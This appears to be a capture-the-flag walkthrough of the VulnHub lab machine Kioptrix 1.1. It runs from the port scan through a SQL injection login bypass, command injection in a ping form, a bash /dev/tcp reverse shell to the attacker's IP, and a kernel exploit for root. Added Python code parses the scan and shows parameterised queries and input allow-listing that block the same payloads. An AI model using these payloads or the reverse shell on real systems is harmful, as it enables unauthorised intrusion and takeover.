Kioptrix 1.1 ~ VulnHub

Enumeration

NMAP


First, I launched a full port scan against the target machine.

nmap -Pn -A -sV -p- $target

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind     syn-ack ttl 64 2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2         111/tcp     rpcbind
|   100000  2         111/udp     rpcbind
|   100024  1         615/udp     status
|_  100024  1         618/tcp     status
443/tcp  open  ssl/https?  syn-ack ttl 64
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/emailAddress=root@localhost.localdomain/localityName=SomeCity
|_Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/emailAddress=root@localhost.localdomain/localityName=SomeCity
618/tcp  open  status      syn-ack ttl 64 1 (RPC #100024)
631/tcp  open  ipp         syn-ack ttl 64 CUPS 1.1
| http-methods:
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql       syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:A3:ED:9F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
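Reading a scan like this by eye works for one box, but the same review is easy to automate. The following is an added example (not part of the original write-up) that parses the nmap port table and its NSE script lines and flags the points a defender would pick out of the output above: SSHv1 support on 22/tcp, the risky PUT method advertised by CUPS on 631/tcp, and a database port reachable from the network. The sample text is a trimmed copy of the scan above, embedded so the script runs offline; the finding labels are my own wording.

```python
import re
from typing import Dict, List

# Trimmed copy of the scan output above, embedded as sample input for the parser.
SAMPLE_NMAP = """\
PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
443/tcp  open  ssl/https?  syn-ack ttl 64
631/tcp  open  ipp         syn-ack ttl 64 CUPS 1.1
| http-methods:
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
3306/tcp open  mysql       syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:A3:ED:9F (VMware)
"""

# One port line: "<port>/<proto> <state> <service> <reason> [<version>]".
# With --reason the reason field is e.g. "syn-ack ttl 64"; the version may be empty.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"\s+(?P<reason>\S+(?: ttl \d+)?)\s*(?P<version>.*)$"
)


def parse_nmap(text: str) -> List[Dict]:
    """Group each port line with the NSE script lines ('|', '|_') that follow it."""
    ports: List[Dict] = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            entry = {k: m.group(k) for k in ("proto", "state", "service", "reason", "version")}
            entry["port"] = int(m.group("port"))
            entry["scripts"] = []
            ports.append(entry)
        elif line.startswith("|") and ports:
            # Drop the "| " / "|_ " prefix and attach the text to the last port seen.
            ports[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports


def flag_findings(ports: List[Dict]) -> List[Dict]:
    """Hardening checks over the parsed scan; each finding names the port it concerns."""
    findings: List[Dict] = []
    for p in ports:
        if p["service"] == "mysql":
            findings.append({"port": p["port"], "issue": "database port reachable"})
        for script in p["scripts"]:
            if "Server supports SSHv1" in script:
                findings.append({"port": p["port"], "issue": "SSHv1 enabled"})
            m = re.match(r"Potentially risky methods: ([A-Z ]+)", script)
            if m:
                findings.append({"port": p["port"],
                                 "issue": f"risky HTTP methods: {m.group(1).strip()}"})
    return findings


if __name__ == "__main__":
    for f in flag_findings(parse_nmap(SAMPLE_NMAP)):
        print(f"{f['port']:>5}  {f['issue']}")
```

The parser keys on the `PORT ... VERSION` table and the `|`-prefixed script lines, so it works on any `nmap -A` text output with `--reason`-style fields; feed it the full scan rather than the trimmed sample to review all 111/618 RPC and 443 entries as well.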

Fine-tuned scan results

WEB - 80

/cgi-bin/      (Status: 403) [Size: 289]
/cgi-bin/.html (Status: 403) [Size: 294]
/index.php     (Status: 200) [Size: 667]
/index.php     (Status: 200) [Size: 667]
/manual        (Status: 301) [Size: 315]
/usage         (Status: 403) [Size: 286]

/


/manual


Exploitation

Authentication Bypass

The web app's login was vulnerable to a SQL injection authentication bypass, using the input shown below.

admin' or '1'='1'#

http://192.168.0.132/index.php


Command Injection

I noticed that the web app ran a command on the underlying system built from user input.


So I tried appending my own command to the input in this field to see whether the system would run it.

127.0.0.1 && whoami


That confirmed command execution on the machine via the web portal. I then used the same vulnerability to get a reverse shell back to my attack box as follows.

127.0.0.1 && bash -i >& /dev/tcp/192.168.0.108/443 0>&1


And it worked!
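Both footholds above come from the same root cause: user input is pasted into a string that is then handed to an interpreter (a SQL engine for the login, a shell for the ping field). The following added example (my code, not the Kioptrix application's) shows the fixed shape of both paths: a parameterised login lookup that treats the bypass string as a plain username, and a ping handler that allow-lists a literal IP address and executes the command as an argv list with no shell. It uses an in-memory SQLite table with a constructed credential as a stand-in for the box's MySQL backend; the two payload constants are the inputs from this write-up.

```python
import hashlib
import hmac
import ipaddress
import sqlite3
import subprocess
from typing import List

# The two inputs from the write-up, kept here only to show they are neutralised.
SQLI_PAYLOAD = "admin' or '1'='1'#"
CMDI_PAYLOAD = "127.0.0.1 && whoami"


def _hash(password: str) -> str:
    # Demo-only digest; a real application would use a salted, slow
    # password hash (bcrypt, scrypt or argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    # Constructed sample credential for the demo.
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", _hash("correct-horse")))
    return conn


def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup: the driver passes the username as data, so the
    quote and comment marker in SQLI_PAYLOAD never reach the SQL parser and
    simply fail to match any stored username."""
    row = conn.execute(
        "SELECT password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    # Constant-time comparison of stored and supplied digests.
    return hmac.compare_digest(row[0], _hash(password))


def validate_target(user_input: str) -> str:
    """Allow-list validation for the ping form: accept only a literal IPv4 or
    IPv6 address and return its canonical form. Anything else, including
    CMDI_PAYLOAD, makes ipaddress raise ValueError."""
    return str(ipaddress.ip_address(user_input.strip()))


def ping_command(user_input: str) -> List[str]:
    """Build an argv list. The validated address is a single argument to ping;
    no shell parses it, so '&&', ';' or redirections carry no meaning here."""
    return ["ping", "-c", "3", validate_target(user_input)]


def run_ping(user_input: str) -> str:
    """Execute the ping without a shell and return its standard output."""
    proc = subprocess.run(ping_command(user_input), capture_output=True,
                          text=True, timeout=15, check=False)
    return proc.stdout


if __name__ == "__main__":
    db = make_db()
    print("admin / correct-horse ->", login(db, "admin", "correct-horse"))
    print("bypass string as user ->", login(db, SQLI_PAYLOAD, "anything"))
    try:
        ping_command(CMDI_PAYLOAD)
    except ValueError as exc:
        print("ping form rejected input:", exc)
```

The allow-list is the important half of the ping fix: even with `subprocess.run` and no shell, a hostname field that accepted arbitrary text could still be used to pass option-like strings to `ping`, whereas a parsed IP address can only ever be an address.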

Privilege Escalation

Linpeas

While running linpeas, I noticed that the box was running a very old Linux kernel (2.6.9-55.EL).


Searchsploit

I then made my way to searchsploit to look for a kernel exploit that would fit this particular target.

searchsploit linux 2.6 centos


Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' | linux/local/9545.c

This was the exploit I ended up going with.


GCC

I then transferred the file over to the remote machine and compiled it there with GCC, so that the resulting binary was built for the target's own architecture.


gcc -o exploit 9545.c


However, the first attempt failed: GCC complained that the C source file had no newline at the end. I added one and compiled again.


After fixing that, the exploit compiled with no issues.

Rooty


And I was the root user! 😁


-Nee
